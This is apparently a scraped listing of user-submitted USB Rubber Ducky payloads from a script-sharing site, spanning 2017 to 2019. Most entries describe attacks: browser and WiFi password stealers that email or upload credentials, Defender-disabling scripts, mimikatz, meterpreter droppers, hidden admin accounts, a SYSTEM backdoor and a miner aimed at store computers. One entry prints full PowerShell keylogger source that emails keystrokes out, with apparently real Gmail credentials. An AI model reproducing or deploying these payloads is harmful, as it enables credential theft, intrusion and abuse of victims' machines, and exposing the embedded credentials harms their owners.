| Windows 10 Grab Password Web and Send Via Email | KaliStealth666 | OS . WINDOWS 10 Professional - TESTED ( 8 - 7 windows - maybe) NAME_SCRIPT . KaliStealthBOT Service . $FREE ************************************************************************************ I Can Grab a PWD Web Firefox - Chrome - IE and Send Via Email. ************************************************************************************* HOW TO SET: Register account SMTP free here https://app.smtp2go.com and *PUT-LOGIN-HERE* & *PUT-YOUR-PWD* then *INSERT-YOUR@EMAIL-HERE* where you want receive the goods :) __________________________________________________________ 1.$url = 'https://1fichier.com/?txl995libj - Pass Stealer Software 2.$url = 'https://1fichier.com/?d1xgmwc5bl - sendEmail Client *** You can change this with every similar software __________________________________________________________ See u.. | windows10 grab password steal pwd web and send via email | 2017-08-18 05:48:52.786000 |
| atao | Export Config IP, Route, Wireless Key on FTP Server | ftp, wireless key, upload | 2017-08-23 20:00:35.205000 | |
| Hidden cron entry that quacks | rumhamFantastic | A first attempt at a duck script. A simple script that installs a cron entry which uses the mac say app to quack every month on the 15th at 3:14 The bash history history is copied to a tmp file and rewritten when done to hide the cron commands. | 2017-09-08 03:36:33.199000 | |
| Ducky Admin | bruno | Ducky Admin | 2017-09-08 08:17:02.370000 | |
| Disable avast | Blue | Disables Avast's service. Tweek or remove DEFAULT_DELAY to make it faster. Useful as most even legitimate files are tagged and disabled by avast. Closes all windows after done and is chainable into other programs like download and run. | 2017-09-10 17:41:39.748000 | |
| Add Windows local Administrator | UK_TinT | This is for when a Windows user has left their computer logged in with local admin rights. The script creates a new user then adds it to the local administrators group | Windows, local administrator | 2017-09-13 17:05:35.886000 |
| windows defender, admin,wifi password, backdoor | spyder | hello this is my 2nd script that i will have shared yay! anyway it will give you the wifi password and i must thank Siem for his wifi code for the duck and i took some parts out of it for instance the emailing the password to your gmail i took that out cause it didnt work for me. and i really dont suggest using this as your attack method well not this code but take parts that you want or just use it all if you want its a free world that one day someone will take over which are the Rocthchilds and yes i don't know how to spell their name cause they suck. | 2017-09-13 19:51:25.869000 | |
| blocked cmd | HitchHiker && Spyder | this code is to get past a blocked cmd for instance at school public to be specific any way all the credit goes to the amazing HitchHiker who came up with the code to do it and im just the person who knows how to use duck code so if you must thank him | 2017-09-14 20:00:25.344000 | |
| Disable Windows defender on Small laptop Like Eee Pc | Small script that disables Windows Defender on small screen laptop, like Asus Eee pc & Others | 2017-09-18 00:03:54.510000 | ||
| ULTRA | ducky flasher 19273 | 2017-09-23 20:59:09.149000 | ||
| ULTRA | DUcky flasher shitts | 2017-09-23 21:00:08.362000 | ||
| mimikatz /w log on windows 10 | Opaque | ****Must have Twin Duck*****This is for windows 10. It will disable windows defender so that the mimikatz payload can run. Change the file name of Mimikatz.exe to mimi.exe. Also added a log file of the read out to get piped back to the ducky drive. | Mimikatz,Windows 10, Windows Defender | 2017-09-24 02:14:44.952000 |
| OSX Spooky Script (Website Open and CLI History Shown) | @VDIHacker | OSX Spooky Script. Opens Safari and show the CLI History. Since there are not a lot of scripts out here for MAC OS X, this was made for a client to show that something plugging into their USB even on MACs is something to be worried about. | OSX,Safari,History | 2017-10-05 01:34:07.798000 |
| MAC Desktop Copy | efdutra | Copies all contents on a Mac OSx Desktop to the Rubber Ducky. Use the Twin Ducky Firmware There are 2 options on the Payload, i divided it with "REM ================================" So, please, just copy the one you want (between those separators), DONT COPY IT ALL ps: Delay times were calculated based on my tests on differents Macs. | macosx, copy | 2017-10-10 18:30:29.254000 |
| MAC Desktop Copy - FIXED | efdutra | Same as before, but now fixed. leaving no trace behind. Make sure your usb is named USB, or change on the script. ps: Delay times were calculated based on my tests on differents Macs. | macosx, copy | 2017-10-10 19:40:02.081000 |
| Prank | Shadowkiller324 | RickRoll for Slow-ish Windows Computer that attempts to self hide may or may not hide properly | rickroll | 2017-10-13 02:37:55.160000 |
| File Snatcher | Shadowkiller324 | A very simple program that should (In theory) find a specific file and paste it to a removable E drive | Copies specified file | 2017-10-13 06:55:34.555000 |
| Ezpzloads | funnyguy123 | idk funny:D | having fung | 2017-10-16 10:28:51.172000 |
| Dan | Dan Augest | This is a wifi password, Graber. | hack | 2017-10-22 22:58:06.230000 |
| Chrome Homepage Prank | RCKid | Chrome homepage prank that sets the homepage to www.bronymate.com. Works with newest version of chrome. Created 10/26/2017. Must have vanilla settings as far as startup pages go. | prank, chrome, brony | 2017-10-26 19:01:21.871000 |
| Download/save/rename/execute a file | Bafil | This script download a file from internet (any extension), create a stealth dir on local pc, and save the downloaded file on it, and execute it. replace http://www.yoursite.com/filename.exe with your address site and file name replace .MIA with name you want. is useful the function for change name of file on saving it; for example, if you have an .exe on remote site, you can rename it as .txt (to avoid problems with antivirus), and save it as .exe automatically. Tested on Win7 and 10 Have fun ;) Bafil | joseph.fenoli@hotmail.com | 2017-10-29 18:42:39.171000 |
| Browser password grabber | austin_s14 | I got the idea of this from "HexHax" payload "Password and Network Config Grabber" Takes browser passwords and sends them to an account on drivehq.com via ftp make a free account at drivehq.com Change "PASS" and "USER" to your drivehq info! Download webbrowserpassview.exe from nirsoft website Upload webbrowserpassview.exe from nirsoft website that you downloaded to the drivehq | Password, Windows, Password Grabber | 2017-10-31 01:57:41.336000 |
| Browser password grabber | austin_s14 | I got the idea of this from "HexHax" payload "Password and Network Config Grabber" Takes browser passwords and sends them to an account on drivehq.com via ftp make a free account at drivehq.com Change "PASS" and "USER" to your drivehq info! Download webbrowserpassview.exe from nirsoft website Upload webbrowserpassview.exe from nirsoft website that you downloaded to the drivehq | Password, Windows, Password Grabber | 2017-10-31 01:57:49.467000 |
| Awareness Demo | DWE | Simple script to demonstrate users how a system can be infected without internet connection or filecopy. We use the editor instead of a powershell script, because we WANT that users will see what happen. | self-generated code, awareness | 2017-11-02 15:11:14.268000 |
| Download exe and run with VBscript | Ammarit Thongthua,Shellcodenoobx | Download exe and run with VBscript | Download | 2017-11-10 04:40:43.599000 |
| Paypal Exploitation Script | Zacablaze | Paypal Exploitation Script !NEEDS IMPROVEMENT! | Paypal, windows, not tested, | 2017-11-10 07:41:32.596000 |
| 201 most common passwords | Zacablaze | 201 most common passwords add your own delays | password, ducky, | 2017-11-10 22:59:18.833000 |
| Download exe and run with VBscript #2 | Ammarit Thongthua,Shellcodenoobx | Download exe and run with VBscript (Version 2) to download a large size file to run as exe | Download exe and run | 2017-11-13 10:15:58.263000 |
| test | test | test | test | 2017-11-14 16:04:21.706000 |
| Rick Roll windows | Justice514 | Rick Roll In Chrome swap STRING chrome.exe https://youtu.be/oHg5SJYRHA0?t=43s with STRING iexplore.exe https://youtu.be/oHg5SJYRHA0?t=43s to use in internet explorer however full screen will not work. | rickroll, windows, chrome | 2017-11-17 11:59:50.515000 |
| NETWORK KILLER | SOMEGUY | NETWORK TROLLING | 2017-11-24 05:16:25.422000 | |
| sardame | @hi | hiiiii | this a test simple | 2017-11-25 15:35:53.259000 |
| R3hab | R3hab | Disable Defender. Download and execute meterpreter payload from " Apache " | Meterpreter, Defender, Powershell | 2017-11-25 17:41:35.206000 |
| Payload Downloader And Executer | R3hab | Disables Defender. Downloads and execute's meterpreter payload. ( Tested on Windows 10 ) | Meterpreter, Metasploit, Defender | 2017-11-25 17:47:17.576000 |
| Payload Downloader And Executer | R3hab | Disables Defender. Downloads and execute's meterpreter payload. ( Tested on Windows 10 ) | Meterpreter, Metasploit, Defender | 2017-11-25 17:49:46.714000 |
| macOS Hello World | Martian Packet | Simple "Hello World" example for macOS. | macOS | 2017-12-07 21:27:14.760000 |
| sdfsdfs | dfsdfsdf | sdfsdfsdf | sdfsdfsdf | 2017-12-22 11:47:08.590000 |
| Open CD Drive | kjvkjvop | Type in all the needed text for ejecting the cd drive, and then save it in %USERPROFILE%, and then executing it, making it run invisibly. To stop it you have to go to Task Manager and stop the wscript.exe file. Please tell me on kjvkjvop@gmail.com, if there is a problem with the code. I haven't gotten my own Rubber Ducky yet. | CD Drive | 2017-12-23 13:17:15.080000 |
| Fork bomb | C.A.N.P. | This bat file overload the processor. | Fork bomb | 2017-12-27 15:44:49.493000 |
| You got pranked | Zack .S | Prank someone with this. | prank,joke | 2018-01-24 02:29:27.618000 |
| ihasabucket.com | Zack .S | Opens 20 tabs of ihasabucket.com | Joke, Prank | 2018-01-24 02:43:44.917000 |
| Windows Reboot | @TnXTyler | Just a simple script I made to reboot a Windows Machine. | reboot | 2018-01-27 15:30:38.429000 |
| exfiltration and web passwords | anonymous | will get all web passwords and will steal documents format your drive letter to D: must have webbrowserpassview(command line version) named p on usb must have hak5 usb rubber ducky exfiltration payload (delete d.cmd but keep all other files) on usb does not require twin duck, only usb with drive letter D: | efiltration,web passwords | 2018-01-28 07:57:16.996000 |
| PornPrank | @ BOIInotreallymyinsta | Open PORNHUB automatically when someone starts google chrome. Enjoy (: | PornPrank, Funny, Boi | 2018-02-04 04:39:04.584000 |
| test | test | test | test | 2018-02-11 19:48:15.643000 |
| Windows 10 - WiFi password grabber (german language setting) | ssrmpc | This script is written for Windows 10 with german language settings. Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt to your gmail account. This script is an encancement of an already existing password grabber (created by Siem TTommy) in order to deal with Windows 10 set to german. Please note that the GUI and MENU commands must use the language specific letter | SSID, Network type, Athentication, WLAN Password | 2018-02-22 09:27:29.265000 |
| Windows 10 Powershell - Email a text file (content) to your Gmail account | ssrmpc | This is a snipplet! The file (Log.txt) must have been created Email a text file (content) to your Gmail account. Just edit the email credentials | Windows 10, Powershell, Gmail | 2018-02-22 09:50:27.536000 |
| pinco | pallino | pinco pallino 123 | 2018-02-27 16:58:25.319000 | |
| Disable WINDOWS DEFENDER | 666ANON777@protonmail.com | ONLY WORKS TO TURN WINDOWS DEFENDER OFF if UAC is enabled you have to add code to disable UAC or code to click yes on UAC Prompts tested on windows 10 Version 1709 (OS Build 16299.125) | Disable WINDOWS DEFENDER, WINDOWS 10 | 2018-03-14 05:25:26.327000 |
| Check Windows 10 Build Version | 666ANON777@protonmail.com | Check Windows 10 Build Version | 2018-03-14 05:32:23.423000 | |
| More Than A Rickroll | Ethan Roy | Ultimate Prank with Rickroll. (Windows Only) | prank, ducky | 2018-03-18 20:13:38.979000 |
| Crypto-Currency Miner | Jadon Linden | Downloads Minergate and installs to mine crypto-curriences on computers. Mainly targeted to auto-deploy at computers at Best Buy, Walmart, etc. You might have to adjust some delays due to different WIFI speeds, since my WIFI is fast. But it should work, if not, it's that then. | #miner #minergate #bitcoin #monero #badusb #payload | 2018-03-20 02:12:23.214000 |
| WiFi Password Exfiltration | https://twitter.com/tylertechnz | This script is similar to other WiFi password exfiltration scripts you may have seen, except this one takes all of the WiFi networks the target computer has ever connected to, then clean up after itself so the target will not have any evidence you were there. The best part is that this script also works on non-admin accounts, and only takes about 30 seconds to complete. All you need to change is the SENDERSEMAIL@GMAIL.COM, RECEIVERSEMAIL@GMAIL.COM and SENDERSPASSWORD. All of these details are in line 43, below the "Email CSV via GMAIL" comment. If you're not using a Gmail account to send the email you'll also need to change the SMTP server from smtp.gmail.com and maybe the port (currently 587 in this version of the script). | wifi, email, password | 2018-03-22 21:59:32.677000 |
| Wallpaper Windows 10 | Nuke | Wallpaper prank Windows 10 - Pegadinha papel de parede Windows 10 | Prank, wallpaper | 2018-03-29 14:29:42.984000 |
| No Internet | Sc1pt3r | This script will disable your targets internet connection until you re-enable it with "ipconfig /renew" | 2018-03-29 23:28:20.720000 | |
| Disable audio jack | Scr1pt3r | This script will disable the users audio jack. To disable headphone usage: 1. Unplug headphones if they are plugged in 2. Plug in ducky 3. Once the powershell windows disappears wait about 3 seconds to make sure the process has ended 4. Unplug ducky and plug headphones back in 5. Watch and laugh when the user goes to play music and everyone hears it | No Headphones, Prank | 2018-03-29 23:37:53.653000 |
| No Internet *Fixed | Scr1pt3r | Fixed script problems | Prank, No internet | 2018-03-30 00:23:15.361000 |
| Time Message | Scr1pt3r | This script will replace the current time with a message for your target | Prank, No Time, Message | 2018-04-01 22:16:39.812000 |
| Savage | Mee | Fake Hacked screen | Fake Hcked | 2018-04-08 15:43:37.311000 |
| Hackertyper Prank | Alex B | Open hackertyper and just "hacks" away resulting in a successful "hack". | prank,hackertyper,crazy,lol | 2018-04-12 14:08:20.563000 |
| Wndows 10 Desktop Ducky | Monte Carlo | Change someone's Desktop Wallpaper to a Ducky :D Works on WIndows 10 | ducky,duck,desktop,background,prank,:D | 2018-04-22 23:40:04.682000 |
| x360G1EE | Bog and Austin | First build April 25th, 2018 | 2018-04-25 19:11:26.484000 | |
| sent mail using gmail | knakie96 | sent mail using gmail account. it depends how fast your internet is how long the delay's are so be smart. :) | usb, mail, gmail.sent, rubber ducky | 2018-04-29 19:57:44.593000 |
| Custom mimikatz payload | itsme | A slightly modified version of https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mimikatz-payload that saves the output of mimikatz to the sd card and cleans up afterwards | Passwords,Exfiltration,Twin Duck | 2018-04-30 03:43:21.297000 |
| Custom mimikatz payload (Fixed) | itsme | A slightly modified version of https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mimikatz-payload Takes about 43 seconds to execute on a decently fast computer (Fixed version) | Passwords,Exfiltration,Twin Duck | 2018-04-30 03:58:39.673000 |
| Rubber Ducky Keylogger NEED HELPS | @aJte38 | Hello, I'm new with all of this stuff, I'm trying to make a keylogger which will be on the usb rubber ducky and when it's plug into a pc the ducky_code will copy this keylogger into the startup folder of the victim's computer. I don't know all command and I didn't find the solution, so I hope somebody will help me. I take the keylogger on the net, in Python 3.5 | keylogger | 2018-05-03 19:41:13.925000 |
| delete chrome history | knakie96 | deletes google chrome internet history | chrome, delete, history | 2018-05-06 15:01:42.581000 |
| Documents and Downloads Copier | @ItzEdInYourBed | Ducktoolkit.com, any of it's users, it's owners, and I are NOT responsible for what you do with this!! Copies all contents of documents folder and downloads folder onto your Rubber Ducky. Requirements: TwinDuck Firmware Suggested: A large micro SD card - Experience has taught me that people like to keep files in these two folders. For contact find me on Twitter @ItzEdInYourBed I'm also on RaidForums.com | windows, copier, stealer, TwinDuck, | 2018-05-08 18:05:08.721000 |
| Chrome password stealer | https://twitter.com/UGame10 | This only works for windows! This script will steal the local password for chrome in about 10 sec and send it to your preferred gmail. You can change delays for slower computers. You can also delete the the GUI L in the end, that only locks the computer in the end of the script. | 2018-05-09 18:00:28.540000 | |
| ++J0nNy#BaNanA++ | ++J0nNy#BaNanA++ | A pair of fast solutions to disable UAC (User Account Control) it works on all windows version 32 and 64 bits with uac (Vista or Earlier) and are valid for all languages (Latin, of course). The scripts were created with the Italian keyboard, so I do not exclude that in some cases they require minor adjustments. if the target machine is old, I recommend extending the delay time. view on github: https://github.com/JonnyBanana/QuickUACk | uac disable-uac quick-uac user-accouunt disable-user-account exploit-windows | 2018-05-11 02:18:43.106000 |
| Chromebook crasher | xFaraday | Opens a new tab in chrome and strings out either "chrome://inducebrowsercrashforrealz/" or "chrome://quit/" into the url forcing the chrome application to close and crash. This gives the OS built around chrome to freak out and often blank screen for a little while. | 2018-05-15 14:21:24.816000 | |
| Upside Down | l1nd1l | - Make a screenshot and rotate it in paint. - Set new flipped screenshot as background. - Hide all desktop-icons. - Hide Taskbar. - Rotate screen itself. | Flip, Windows 10, Rotate, Wallpaper | 2018-05-23 12:09:50.606000 |
| Create file on host | l1nd1l | - Create a file over Powershell - Write some text into the file - Open the file after a while with notepad | Windwos 10, create a file, Powershell | 2018-05-23 12:17:53.333000 |
| rickroll prank | duckcoder | This code will make a vbs file to turn the volume op and open never gonna give you up 10 hours and open fakeupdate:net and use the fake windows 10 update screen | rickroll,10hours | 2018-06-14 09:39:13.406000 |
| download program, run the program at startup of the computer | :) | change mediafile with url change name with file change onoma arxiou with file | otinane | 2018-06-17 12:05:13.926000 |
| download program, run the program at startup of the computer | youtube pc/android/ios hack | change mediafile with url change name with file change names file with file | 2018-06-17 12:11:12.369000 | |
| windows destroyer | duckcoder | this will destroy any windows pc 7 or higher you might have to edit a few special letters | windows,destroyer | 2018-06-18 06:24:20.152000 |
| AddEmp (Win10) | K2 | Creating a new local admin user on Windows 10. | Add,Employer,Emp,Account,Admin,Windows,10,Payload,Ducky,Quick | 2018-06-22 14:35:42.153000 |
| Rick Roll Windows | Chris.F | Rick Roll. It uses Power Shell to Turn Up the Volume. Will open YouTube Never Gonna Give you up and enter into Full Screen. Used on Windows. | Rick Roll | 2018-06-22 15:38:40.813000 |
| EvilOSX | Marten4n6 | Download and execute EvilOSX from the given host, feel free to mess around with the delays. See: https://github.com/Marten4n6/EvilOSX | rat, reverse-shell | 2018-06-23 10:43:37.164000 |
| KCSEC - Powershell FOD Script for TwinDuck (Special 2) | KCSEC | KCSEC - Powershell FOD Script for TwinDuck (Special 2) --By KCSEC as part of the toolkit here --https://github.com/KCSEC/USB-Rubber-Ducky | KCSEC;fod;powershell;bypass;windows 10 | 2018-07-06 22:20:10.875000 |
| Windows 10 Update Prank | ATTR1TION | This is a simple script that opens a web page and sends the target to fakeupdate.net and tricks them into believing their computer is being updated. | Windows, Windows10, Prank | 2018-07-19 23:06:47.035000 |
| DORRIAN | Kill Windows! Test on windwos 7! | #D25 | 2018-07-25 12:52:49.197000 | |
| Kill windows! | Dorrian | Kill Windows! Test on windows 7! | 2018-07-25 12:54:51.086000 | |
| Windows Kill V2 | Dorrian | Windows Kill! | 2018-07-25 13:22:04.080000 | |
| Xmas tree | Ejemplo de ejecucion del notepad | 2018-07-30 21:38:42.277000 | ||
| Chromebook Enrollment | graves | Chromebook Enrollment Script (Lenovo 500e Chromebook) | Chromebook Enrollment | 2018-08-01 13:36:17.213000 |
| CMD with UAC (Not Tested) | PR0XY#8008 | Makes cmd.bat file to access cmd with user account control on (not tested) (first script) | 2018-08-09 15:10:10.961000 | |
| PaSSwodStealler | Rams3sTh3S3c0nd | YOU NEED TWINDUCKY | Password Google | 2018-08-27 18:03:49.341000 |
| Windows password change, 2 sec | Rubber Duck | Payload to change windows password to "password", in less than 2 seconds... | Windows, Password, Bypass | 2018-09-01 15:33:12.155000 |
| Galaxy S8 Android 8.0.0 DEV_ADB_APPMON | Phazedroid | THIS SCRIPT WAS MADE FOR GALAXY S8 ANDROID 8.0.0 - MAY WORK ON OTHERS! DESCRIPTION: In 40s OR LESS = ENABLES DEVELOPER MODE ENABLES ADB DEBUGGING DISABLES ANDROID APP MONITOR REQUIRED: YOU WILL NEED TO KNOW/ENTER THE SECURITY PATTERN/PASS FOR THIS TO WORK! (DEV MODE ENABLE) CAUTION: SCRIPT WILL FAIL if DEVELOPER MODE IS ALREADY ENABLED! CAUTION: SCRIPT WILL FAIL if APP MONITOR IS ALREADY DISABLED - but DEV MODE and ADB will work. DIRECTIONS: 1. MANUALLY "CLOSE ALL APPS" BEFORE RUNNING SCRIPT! 2. INSERT RUBBER DUCKY. 3. WAIT APPROX 10 SECONDS FOR SECURITY PROMPT AND ENTER PATTERN/CODE TO ENABLE DEV MODE. 4. WAIT FOR SCRIPT TO RETURN TO HOME SCREEN AND YOU'RE DONE! | Android, 8.0.0, Samsung, Galaxy S8, DEV MODE, ADB, App Permission Monitor | 2018-09-07 08:40:07.120000 |
| Reboot Windows 8 | Darman Sejuk | Reboot system for Windows 8 and 8.1 | Windows 8, reboot, | 2018-09-30 00:06:39.737000 |
| 1nsertt | https://twitter.com/1nsert_nam3 | This is a ducky script adds a admin account that its user name is Evil123 and its password is L00k1T. You can change it in the code because opens source LOL (windows) | Admin, root, windows | 2018-10-01 18:35:18.845000 |
| d | d | d | c | 2018-10-02 17:15:22.035000 |
| SYSTEM-Level Command Line Backdoor | TechManPro | Use wisely. This creates a SYSTEM level command prompt "backdoor" of sorts that can be launched in almost any "secure" Windows environment (i.e. LogonUI.exe - Lock Screen & Ctrl+Alt+Del Screen) by using the Sticky Keys shortcut (Pressing shift 5 times) or the keyboard combination Alt+Shift+PrtScr, which will launch the command prompt under the same account in which the current environment is running, i.e. SYSTEM or your user account. You WILL need existing Administrator credentials on the computer, NOT a Power User. Enjoy. If logged in as Administrator, it is completely automated. If logged in as a restricted user, you will be presented with a UAC prompt. If logged in as a Power User, the payload will likely ultimately fail. | cmd,command prompt,backdoor,system,system-level,command line,windows,windows nt | 2018-10-03 21:07:57.866000 |
| asdf | asdf | 2018-10-15 23:10:19.265000 | ||
| test | # Edit only this section! $TimesToRun = 2 $RunTimeP = 1 $From = "samkhok1150@gmail.com" $Pass = "korn0809130096" $To = "tanakorn593@gmail.com" $Subject = "Keylogger Results" $body = "Keylogger Results" $SMTPServer = "smtp.mail.com" $SMTPPort = "587" $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force) ############################ $TimeStart = Get-Date $TimeEnd = $timeStart.addminutes($RunTimeP) #requires -Version 2 function Start-KeyLogger($Path="$env:temp\keylogger.txt") { # Signatures for API Calls $signatures = @' [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); '@ # load signatures and make members available $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru # create output file $null = New-Item -Path $Path -ItemType File -Force try { # create endless loop. When user presses CTRL+C, finally-block # executes and shows the collected key presses $Runner = 0 while ($TimesToRun -ge $Runner) { while ($TimeEnd -ge $TimeNow) { Start-Sleep -Milliseconds 40 # scan all ASCII codes above 8 for ($ascii = 9; $ascii -le 254; $ascii++) { # get current key state $state = $API::GetAsyncKeyState($ascii) # is key pressed? if ($state -eq -32767) { $null = [console]::CapsLock # translate scan code to real code $virtualKey = $API::MapVirtualKey($ascii, 3) # get keyboard state for virtual keys $kbstate = New-Object Byte[] 256 $checkkbstate = $API::GetKeyboardState($kbstate) # prepare a StringBuilder to receive input key $mychar = New-Object -TypeName System.Text.StringBuilder # translate virtual key $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) if ($success) { # add key to logger file [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) } } } $TimeNow = Get-Date } send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl Remove-Item -Path $Path -force } } finally { # open logger file in Notepad exit 1 } } # records all key presses until script is aborted by pressing CTRL+C # will then open the file with collected key codes Start-KeyLogger | 2018-10-25 09:24:10.794000 | ||
| Diskpart Clean/Format/Assign Drive Letter | micool9 | Automated Diskpart clean/format/assign a drive using the rubber ducky usb. If prompted admin you will have to hit yes if prompted, otherwise script will not run properly. (Tested on Windows 10) You may have to tweak the delay's to best fit your machine/size of drive etc. Otherwise it runs great, you can switch it per disk you are planning to clean and format. Once complete it exit's out of diskpart for you. | DISKPART | 2018-10-26 19:22:43.463000 |
| Diskpart Clean/Format/Assign Drive Letter | micool9 | Automated Diskpart clean/format/assign a drive using the rubber ducky usb. Runs in Admin (Tested on Windows 10) You may have to tweak the delay's to best fit your machine/size of drive etc. Otherwise it runs great, you can switch it per disk you are planning to clean and format. Once complete it exit's out of diskpart for you. | DISKPART | 2018-10-26 20:34:39.732000 |
| Website password grabber | kyoceti | fixed version of Rams3sth3s3c0nd password grabber. | Password | 2018-10-31 04:59:22.777000 |
| Website password grabber *FIXED* | kyoceti | fixed version of Rams3sth3s3c0nd password grabber. (and my own since I'm a hypocrite) | Password | 2018-10-31 05:15:45.941000 |
| NEXT_GEN_HELLO_WORLD | Riyad Walker | this will print hello world on the notepad in hackers style. | helloworld,hacker | 2018-11-04 07:00:08.676000 |
| NEW Hello World | Riyad Olav Walker | Hello World | helloworld,hacker,firstscript,notepad | 2018-11-05 12:21:27.388000 |
| Rubber-Ducky_Disable_W10-Defender_Technician-Edition | Jonny Banana | Rubber-Ducky_Disable_W10-Defender_Technician-Edition https://github.com/JonnyBanana/Rubber-Ducky_Disable_W10-Defender_Technician-Edition A quickly script for Rubber Ducky to disable w10 defender on large scale The first Script is the Killer, the second is the Healer In my activities as a technician I have to format many computers during the month, and as many refuse to buy the license i have to use a lot of crack (although I do not recommend every time, but the money they pull at the time ...). Since the windows 10 defenses are slightly improved compared to the previous ones (even if it is still punctured like a colander ...), I had the need to write a quick rubber ducky script that would disable Windows Defender on windows 10 platforms (the more installed system in our time). I have also added an additional script that reports UAC and windows defender to the recommended settings. The Scripts are two: Killer and Healer, the first disables and the second of course rehabilitates everything. Tested Builds:1803 (latest oct. 2018) Demo: https://www.youtube.com/watch?v=uJD7qPVojz8&t=13s | disable windows 10 defender | 2018-11-11 21:56:43.931000 |
| Active Batch Executor | TechManPro | This script requires twin duck firmware. What it does is launch a command prompt and gets the drive letter that the SD card is mounted as by finding which drive contains the inject.bin file. It then finds any "active" batch or text file (starting with 01 and ending with an extension ending in "t", such as bat or txt) and writes each file's contents to a file of the same name and type in the temporary directory, executes it, and then removes it. This is nice for systems that prevent copying or executing from removable devices. Enjoy. | batch, execution, scripts, twin duck | 2018-11-12 20:28:30.734000 |
| Tseries Destroyer | Adekat04 | People wanted the script so here... I don't know it it'll work 100% but this is the one I used in the video **THIS WILL ONLY WORK ON RUBBER DUCKY USB'S NOT REGULAR USB'S** Rubber Ducky : https://shop.hak5.org/products/usb-rubber-ducky-deluxe Reddit Post: https://www.reddit.com/r/PewdiepieSubmissions/comments/9xz1jt/i_made_a_script_that_will_automatically_go_to/ | 2018-11-17 20:05:53.101000 | |
| Tseries Destroyer | shamansc | MAC VERSION Reddit Post: https://www.reddit.com/r/PewdiepieSubmissions/comments/9xz1jt/i_made_a_script_that_will_automatically_go_to/ | 2018-11-17 20:36:02.187000 | |
| Tseries Destroyer_mac+bell | shamansc | MAC VERSION + SMASHED BELL Reddit Post: https://www.reddit.com/r/PewdiepieSubmissions/comments/9xz1jt/i_made_a_script_that_will_automatically_go_to/ | 2018-11-17 20:48:40.815000 | |
| T-Series Destroyer v2 | DiamondxCrafting | Better than https://ducktoolkit.com/viewscript/5bf074a1ac04af589586b7d0/. | 2018-11-17 21:13:25.950000 | |
| Matrix V3 | Jozeknj | This is a script originally created by Harvey, This is an updated version of the matrix cmd script. This Script has been modified to select the current active user Desktop, instead of manually changing the directory. The script also executes the matrix cmd script now. Things that could be added are: checking to see if the matrix batch file has already created or not and to delete it before running script again, OR checking to see if the matrix batch file has already been created and skip creating the batch file, but just running the matrix batch file. | matrix updated version | 2018-11-20 01:19:23.844000 |
| Free Instagram Followers Hack | Jadon Linden | Free 500 Instagram Followers! MAKE SURE NOTHING ELSE IS OPEN WHILE DOING THIS because it will mess it up. Only works with Chrome, so make sure you have it. VERY IMPORTANT: Make sure you open the script with notepad and press CTRL+H and enter "username here" (without quotes of course) for Find What and enter your Instagram username for Replace With. Then copy the whole script and enter it into https://www.browserling.com/tools/text-repeat and enter how many times aka how many followers you want, and press Repeat then copy the whole script | instagram, followers | 2018-11-20 22:17:01.787000 |
| JAR Downloader & Auto Exec | Cuuky | This script will download a jar file from your server, make an startup script for it so it runs on the computer all the time and and the end it will run the jar. You can choose the path of the jar by editing "C:\windows.jar", but then do it in the entire script! ------------------- ATTENTION ------------------- You HAVE to replace "%YOUR_WEBSITE%" with the website you want the jar to get downloaded from. ------------------- ATTENTION ------------------- If you want to do it like me, just upload the JAR into the "var/www/html" folder on your linux server and rename it to "dl.jar". Then replace your web adress with "%YOUR_WEBSITE%". And maybe you have to replace the F in "ALT f" in line 41 with the first letter of the word "file" in your language. In german for example it would be "ALT D" for "Datei" Have fun and happy coding :) | Java,jar,autoexec,download | 2018-12-05 12:50:10.188000 |
| reboot | Reboot system | 2018-12-14 10:22:52.816000 | ||
| test | test | hello | test | 2018-12-19 12:10:44.012000 |
| test | test | hello | test | 2018-12-19 12:11:04.523000 |
| Payload - Powershell Wget + Execute 2019 | chati3l | Este script es para bajar y ejecutar un archivo. Probado en Windows 7 SP1 con Internet Explorer 11. Comentarios a chatiel@yopmail.net Payload - Powershell Wget + Execute version 2019 | Payload download + Execute, Payload - Powershell Wget + Execute | 2018-12-29 03:37:08.709000 |
| disable windows defender | T3rR0rB!Tz | disable windows defender 1.0 | duckytoolkit,windows defender,diasable | 2018-12-29 11:32:36.428000 |
| Keiran0s | Keiran1712 | WiFi Grabber. Uploads to FTP Server I used a raspberry pi for this, great potential as you can hook it up to mobile data hotspot, and use it on the go. Enjoy. | WiFi, FTP, Password, SSID, | 2019-01-04 22:07:41.411000 |
| USB File Exfil | DoveTail | USB rubber duck script to exfil documents using a second regular USB and File Explorer file types | Yeet | 2019-01-16 19:22:39.406000 |
| HackingDemo (Notepad) | Cloudcompany.at | Notepad Demo | Notepad Demo | 2019-02-12 15:51:18.318000 |
Advertisting